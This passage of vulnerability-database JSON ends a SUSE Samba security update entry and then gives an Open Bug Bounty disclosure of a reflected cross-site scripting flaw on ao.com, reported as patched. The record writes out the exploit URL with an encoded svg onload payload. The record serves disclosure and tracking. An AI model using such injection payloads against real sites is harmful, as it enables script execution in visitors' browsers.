them; (bso#11589).\n - Backport some valgrind fixes from upstream master; (bso#11597).\n - s3: smbd: have_file_open_below() fails to enumerate open files below an\n open directory handle; (bso#11615).\n - docs: Fix some typos in the idmap config section of man 5 smb.conf;\n (bso#11619).\n\n", "edition": 1, "modified": "2016-04-13T00:08:02", "published": "2016-04-13T00:08:02", "id": "SUSE-SU-2016:1022-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00020.html", "type": "suse", "title": "Security update for samba (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openbugbounty": [{"lastseen": "2017-10-17T06:24:16", "bulletinFamily": "bugbounty", "cvelist": [], "description": "##### Vulnerable URL:\n \n \n http://ao.com/l/search/101/99/?search=aids%22%3C/span%3E%3C/h1%3E%3Csvg/onload=alert%28%27xssposed%27%29%3E%3Cspan%3E\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at 26.07.2017 \nLatest check for patch:| 26.07.2017 17:37 GMT \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 11563 \nGoogle Pagerank| 5 \nVIP website status:| Yes \nCheck ao.com SSL connection:| (Grade: A) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 26 February, 2016 01:01 GMT \nGeneric security notifications sent to website owner| 26 February, 2016 01:04 GMT \nNotification sent to subscribers (without technical details)| 26 February, 2016 02:17 GMT \nVulnerability details disclosed by researcher| 25 March, 2016 01:11 GMT \nVulnerability patched by the website owner| 26 July, 2017 17:37 GMT\n", "modified": "2017-07-26T17:37:00", "published": "2016-02-26T01:01:00", "href": "https://www.openbugbounty.org/reports/137924/", "id": "OBB:137924", "type": "openbugbounty", "title": "ao.com XSS vulnerability ", "cvss": {"score": 0.0, "vector": "NONE"}}]}